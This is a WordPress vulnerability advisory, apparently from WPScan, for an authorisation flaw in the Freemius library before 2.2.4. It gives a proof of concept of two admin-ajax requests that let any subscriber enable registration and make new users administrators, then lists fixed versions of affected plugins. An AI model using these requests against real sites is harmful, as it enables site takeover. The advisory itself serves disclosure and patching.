WordPress Plugin Vulnerabilities
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
Description
The library, used in numerous plugins, does not have proper authorisation when updating blog options, allowing any authenticated users, such as subscriber to update arbitrary options
Proof of Concept
As any authenticated user: Enable new user registrations: https://localhost/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1 Set the default role for new registrations to Admin: https://localhost/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator
Affects Plugins
Fixed in 1.1.4
Fixed in 3.0.2
Fixed in 2.3.2
Fixed in 3.0.9
Fixed in 3.8.1
Fixed in 4.1.9.5
Fixed in 0.7.1
Fixed in 3.3.57
Fixed in 2.6.4
Fixed in 1.6.17
Fixed in 3.1.7
Fixed in 2.6
Fixed in 2.5.2
Fixed in 2.7.3
Fixed in 1.8.3
Fixed in 3.0.4
Fixed in 1.3.20
Fixed in 1.4.3
Fixed in 4.0.5
Fixed in 3.3.1.2
Fixed in 2.1.9.8
Fixed in 2.2.3.1
Fixed in 1.0.2
Fixed in 1.2.6
Fixed in 1.1.2
Fixed in 3.0.4
Fixed in 1.9.3
Fixed in 0.7.1
Fixed in 1.1
Fixed in 3.2
Fixed in 1.6.5
Fixed in 1.1.4
Fixed in 4.2997
Fixed in 1.6.3
Fixed in 2.18.0
Fixed in 3.3.0
Fixed in 1.4.0
Fixed in 3.2.6
Fixed in 1.7.2
Fixed in 0.7.3
Fixed in 2.0.1 
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 1.2.3
Fixed in 1.0.1
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 3.2
Fixed in 1.0.9.22
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 1.3.1
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 0.1.1
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix Affects Themes
References
Classification
Type
INCORRECT AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Ryan Dewhurst, ptsfense, 0xdecafbad
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-02-26 (about 4 years ago)
Added
2019-03-01 (about 4 years ago)
Last Updated
2022-05-28 (about 1 years ago)
WPScan 